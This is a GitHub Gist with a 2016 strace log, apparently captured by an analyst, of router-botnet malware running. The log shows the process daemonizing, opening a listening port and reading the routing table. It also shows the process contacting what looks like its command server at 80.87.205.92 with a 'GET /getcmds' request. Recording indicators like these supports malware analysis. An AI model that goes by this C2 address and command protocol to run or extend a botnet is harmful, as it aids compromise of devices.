Created
September 12, 2016 04:16
-
-
Save bmaia/a3f976bb608d1212d9b955f46fe85014 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1078 write(1<socket:[4448]>, "Hi. Mail me if u want: routerbots@_____.__\n", 44) = 44 | |
1078 socket(AF_LOCAL, SOCK_STREAM, 0) = 7<socket:[22218]> | |
1078 bind(7<socket:[22218]>, {sa_family=AF_LOCAL, sun_path=@"bbot_mutex_202613"}, 110) = 0 | |
1078 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xc6048) = 1079 | |
1078 exit_group(0) = ? | |
1078 +++ exited with 0 +++ | |
1079 setsid() = 1079 | |
1079 clone( <unfinished ...> | |
(...) | |
1080 gettimeofday({500, 278384}, NULL) = 0 | |
1080 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 10<socket:[22231]> | |
1080 ioctl(10<socket:[22231]>, FIONBIO, [1]) = 0 | |
1080 setsockopt(10<socket:[22231]>, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 | |
1080 bind(10<socket:[22231]>, {sa_family=AF_INET, sin_port=htons(11833), sin_addr=inet_addr("0.0.0.0")}, 16) = 0 | |
1080 listen(10<socket:[22231]>, 1024) = 0 | |
1080 open("/proc/net/route", O_RDONLY|O_LARGEFILE) = 11</proc/net/route> | |
(...) | |
1080 gettimeofday({500, 318385}, NULL) = 0 | |
1080 _newselect(32, [8<pipe:[22229]> 10<socket:[22231]>], [], NULL, {0, 959999}) = 0 (Timeout) | |
1080 gettimeofday({501, 278401}, NULL) = 0 | |
1080 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 11<socket:[22282]> | |
1080 ioctl(11<socket:[22282]>, FIONBIO, [1]) = 0 | |
1080 connect(11<socket:[22282]>, {sa_family=AF_INET, sin_port=htons(1055), sin_addr=inet_addr("80.87.205.92")}, 16) = -1 ENETUNREACH (Network is unreachable) | |
1080 close(11<socket:[22282]>) = 0 | |
1080 write(0<socket:[4448]>, "GET /getcmds?bid=notgenerated HTTP/1.1\r\nConnection: close\r\nHost: 80.87.205.92\r\n\r\n", 81) = 81 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment